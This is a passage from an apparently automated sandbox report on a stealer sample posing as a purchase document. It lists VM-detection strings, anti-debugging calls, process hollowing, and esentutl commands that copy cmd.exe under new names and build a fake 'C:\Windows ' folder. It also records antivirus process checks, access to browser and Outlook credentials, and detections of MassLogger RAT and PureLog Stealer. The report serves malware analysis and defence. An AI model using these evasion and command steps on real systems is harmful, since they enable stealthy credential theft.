                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PL[SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: SensorDataService.exe, 0000001F.00000003.1750375651.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1783409850.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device~
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: xpha.pif, 00000017.00000002.1759317605.000000000287B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
                  Source: SensorDataService.exe, 0000001F.00000002.1855950363.00000000004EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: SensorDataService.exe, 0000001F.00000003.1848760946.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000001F.00000003.1750375651.00000000004D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Storage Spaces Controller%;Microsoft Storage Spaces Controllersoft Hyper-V Gener
                  Source: Spectrum.exe, 00000023.00000002.2675188373.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !2Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 00000023.00000003.1781177346.00000000005A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3ZVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: SensorDataService.exe, 0000001F.00000002.1855950363.00000000004EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual Netl
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 00000023.00000003.1781476971.0000000000590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter14
                  Source: Spectrum.exe, 00000023.00000002.2675188373.00000000005A7000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
                  Source: snmptrap.exe, 00000020.00000002.2678329194.0000000000582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
                  Source: Spectrum.exe, 00000023.00000003.1783409850.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `[SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: ssh-agent.exe, 00000026.00000002.2675416914.000000000040C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllff
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeAPI call chain: ExitProcess graph end nodegraph_0-38027
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02B2F744
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040CE09
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_1_004019F0
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B2894C
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_0047D594 mov eax, dword ptr fs:[00000030h]9_1_0047D594
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001BC1FA mov eax, dword ptr fs:[00000030h]13_2_001BC1FA
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001BC1FA mov eax, dword ptr fs:[00000030h]22_2_001BC1FA
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_0040ADB0 GetProcessHeap,HeapFree,9_1_0040ADB0
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess token adjusted: DebugJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004123F1 SetUnhandledExceptionFilter,9_1_004123F1
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040CE09
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040E61C
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_1_00416F6A
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A6EC0 SetUnhandledExceptionFilter,13_2_001A6EC0
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_001A6B40
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A6EC0 SetUnhandledExceptionFilter,22_2_001A6EC0
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_001A6B40
                  Source: C:\Users\Public\xpha.pifCode function: 23_2_00773470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00773470
                  Source: C:\Users\Public\xpha.pifCode function: 23_2_00773600 SetUnhandledExceptionFilter,23_2_00773600
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory allocated: C:\Users\Public\Libraries\ymafvvdS.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                  Sample uses process hollowing technique
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection unmapped: C:\Users\Public\Libraries\ymafvvdS.pif base address: 400000Jump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory written: C:\Users\Public\Libraries\ymafvvdS.pif base: 2A5008Jump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeProcess created: C:\Users\Public\Libraries\ymafvvdS.pif C:\Users\Public\Libraries\ymafvvdS.pifJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B15ACC
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: GetLocaleInfoA,0_2_02B1A7C4
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B15BD8
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: GetLocaleInfoA,0_2_02B1A810
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: GetLocaleInfoA,9_1_00417A20
                  Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,13_2_00198572
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,13_2_00196854
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,13_2_00199310
                  Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,22_2_00198572
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,22_2_00196854
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,22_2_00199310
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST55B8.tmp VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST55B9.tmp VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B1920C GetLocalTime,0_2_02B1920C
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004C0080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW,12_2_004C0080
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B1B78C GetVersionExA,0_2_02B1B78C
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ymafvvdS.pif PID: 7996, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ymafvvdS.pif PID: 7996, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts                  		1
                  Windows Management Instrumentation                  		2
                  LSASS Driver                  		1
                  Abuse Elevation Control Mechanism                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		11
                  System Time Discovery                  		1
                  Taint Shared Content                  		1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts3
                  Native API                  		1
                  DLL Side-Loading                  		2
                  LSASS Driver                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Shared Modules                  		1
                  Valid Accounts                  		1
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager1
                  System Network Connections Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter                  		1
